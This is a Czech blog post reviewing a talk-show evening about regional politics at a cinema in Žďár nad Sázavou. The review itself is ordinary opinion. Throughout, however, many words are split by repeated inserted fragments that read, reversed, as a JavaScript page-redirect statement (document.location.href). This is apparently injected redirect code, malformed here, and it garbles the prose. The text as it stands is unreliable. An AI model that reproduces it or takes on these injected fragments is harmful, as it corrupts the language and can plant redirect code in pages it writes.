Rainbow page separator

Nuda, aneb recenze jednoho pátečního večera

Úterý, 29. března 2016

Možná přijde i Tonda Blaník

Ptal se mě někdy v týdnu jeden příjemný chlapík, zda nejdu v pátek 18. března na jakési pozdně večerní řečnění, late night talk show, mám-li použít ten správný anglický termín. Odpověděl jsem mu pravdu, tedy že jedna z mála věcí, která mi chybí je čas, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se mi moc nechce nějaké řečnění poslouchat.

Nicméně situace se schumelila jinak a nakonec jsem se v pátek 18. března ocitl v kině Vysočina na diskusním komponovaném pořadu Možná přijde i Tonda Blaník. Pořad interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové televize Stream Kancelář Blaník a DVTV mám rád, tak … tak jsem prostě šel.

Uspořádat něco takového ve Žďáře je úspěch. Možná zpola zaplněné hlediště přivítalo Danielu Drtinovou a její hosty: Miroslavu Němcovou, Sabinu Slonkovou, paní hraběnku Kinskou a tři žďárské aktivisty. Potud všechno v pořádku, ale … jaksi mám pocit, že celé akci cosi scházelo, vlastně už od začátku. Samozřejmě můžeme prominout čtvrthodinové zpoždění, ale se vším ostatním už je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to horší. Od počátku jsem měl pocit, že není o čem hovořit. Paní moderá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ostatně uvedla hned na úvod – jediné, co na internetu našla je jakýsi náš žďárský „problém“ s vířivkou v Relaxačním centru. To jsme měli za sebou po pár větách a pak už nas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupil kolovrátek.

Zeman a Vysočina. Babiš a Pelhřimov. A dál nic … nuda, nuda šeď. Mám-li být spravedlivý, tak podle mého názoru jen paní Němcová dokázala obecenstvu sdělit nějaké informace, ať už o sobě či o jakémsi vysokolopolitickém zákoutí. Mírně otrávené Sabině Slonkové jsem díky horšímu zvuku skoro nerozuměl a paní Kinské, ač šaramantní a energií nabité dámě, jsem také moc nerozuměl (což nebrání [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, abych ji nemohl obdivovat za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že se česky naučila). Navíc mám pocit, že paní Drtinová nepochopila, co festival Korespondance je, neboť žila snad v domnění, že lidé ze Žďáru chodí na zámek tančit.

Možná právě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byl problém a paní moderá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka se k němu i přiznala, když hovořila o „google novinařině“… tedy podceněná příprava. Ale což, říkal jsem si, vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí ještě žďárští aktivisté z Žijeme Žďárem a ti jsou tu doma a něco se dozvíme.

Jenže i pak mě sžíralo jakési přesvědčení o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že vlastně není o čem mluvit. Několik v mlze představených projektů, jejichž smysl je možná příjemný, ale … jaksi se nic zásadního neděje, nebo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kolem sebe alespoň nevidím. Možná je na konkrétní věci ještě asi po dvou letech čas, ale za mě … přejde se od projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových manažerů zasedajících v kavárnách k něčemu, co bude ve Žďáře vidět, co bude realizované?

A tak běžel čas, občas proložený hlasováním , kde nebylo nesnadné odhadnout výsledek, promítlo se několik dílů Kanceláře Blaník a viděli jsme v premiéře díl nejnovější. Škoda, že byl ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát zaměřen vysoce regionálně, tedy na parkoviště u pražského Parlamentu.

Už jsem si myslel, že tuhle neslanou a nemastnou nudu nemůže nic trumfnout, ale mýlil jsem se. Vyvrcholení však přišlo ne z jeviště, ale z hlediště, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to při úplně posledním příspěvku. S ním přišel pan Brychta, bývalý starosta a mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta. A jako vždycky, jeho slova byla plná ocenění vlastní práce v minulosti, jistého druhu sebelí[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti, proložené několika vzdechy o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vlastně nikdy nikdo nemohl dělat lépe, než když radnici ovládala ruka páně Brychty. Nu což, diváci pan Brychtu ocenili červenými kartami, hukotem a pískotem.

Tak milý čtenáři … tak bylo podle mě v pátek večer v kině. Popravdě – škoda času, škoda. Ale možná mě jenom rozladilo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že vedle mě seděl nějaký aktivista, jehož oblečení bylo prodchnuté dýmem marihuany a v sále po něm zbyl kelímek od piva. V každém případě však budu vždycky rád, když se věci veřejné nebudou zajímat jen politici jedenkrát za čtyři roky, ale i aktivní lidé.

Luděk Lopour

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: https://www.facebook.com/ZijemeZdarem/